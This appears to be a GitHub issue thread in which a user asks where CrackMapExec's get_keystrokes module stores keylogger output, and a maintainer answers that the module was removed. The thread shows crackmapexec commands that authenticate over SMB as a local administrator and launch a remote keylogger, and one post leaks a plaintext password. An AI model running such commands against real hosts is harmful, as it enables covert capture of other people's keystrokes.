How does get_keystrokes work?

[Anton19780301]

Good afternoon, how does get_keystrokes work? Where can I see a keylogger record? The wiki doesn't say anything about this. So I launched it It works (I think so)

root@kali:~/CrackMapExec# crackmapexec smb 10.241.0.83 -u Администратор -p MyPassword --local-auth -M get_keystrokes CME 10.241.0.83:445 R9952-W01340204 [*] Windows 6.3 Build 9600 (name:R9952-W01340204) (domain:REGIONS) CME 10.241.0.83:445 R9952-W01340204 [+] R9952-W01340204\Администратор:Gthtrk.xfntkm1 (Pwn3d!)

Its all.... What's next ?

[abid28june]

it works perfectly, plz see folder where you installed your CME, check /.cme/logs file or folder within your Main folder of CrackMapexece

[n00py]

You redacted the password at the beginning and replaced it with "MyPassword", but further down you can see that it is "Gthtrk.xfntkm1"

[Anton19780301]

this is when I tried to hide the password when posting here, I forgot to change it in one line. My mistake.

[Anton19780301]

I will return to this task. It just doesn't work - where's the log? I use

crackmapexec smb 10.241.0.83 -u Administrator -p MyPassw0rd --local-auth -M get_keystrokes -o TIMEOUT=1 GET_KEYS... [] This module will not exit until CTRL-C is pressed GET_KEYS... [] Keystrokes will be stored in ~/.cme/logs

SMB 10.241.0.83 445 R9952-W11013402 [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:R9952-W11013402) (domain:R9952-W11013402) (signing:True) (SMBv1:True) SMB 10.241.0.83 445 R9952-W11013402 [+] R9952-W11013402\Administrator:MyPassw0rd (Pwn3d!) GET_KEYS... 10.241.0.83 445 R9952-W11013402 [+] Executed launcher

And ...... no logs in /root/home/.cme/logs

Is it possible to specify where to record the log manually? maybe he doesn’t understand all the keys? or writes not in all situations?

[mpgn]

module removed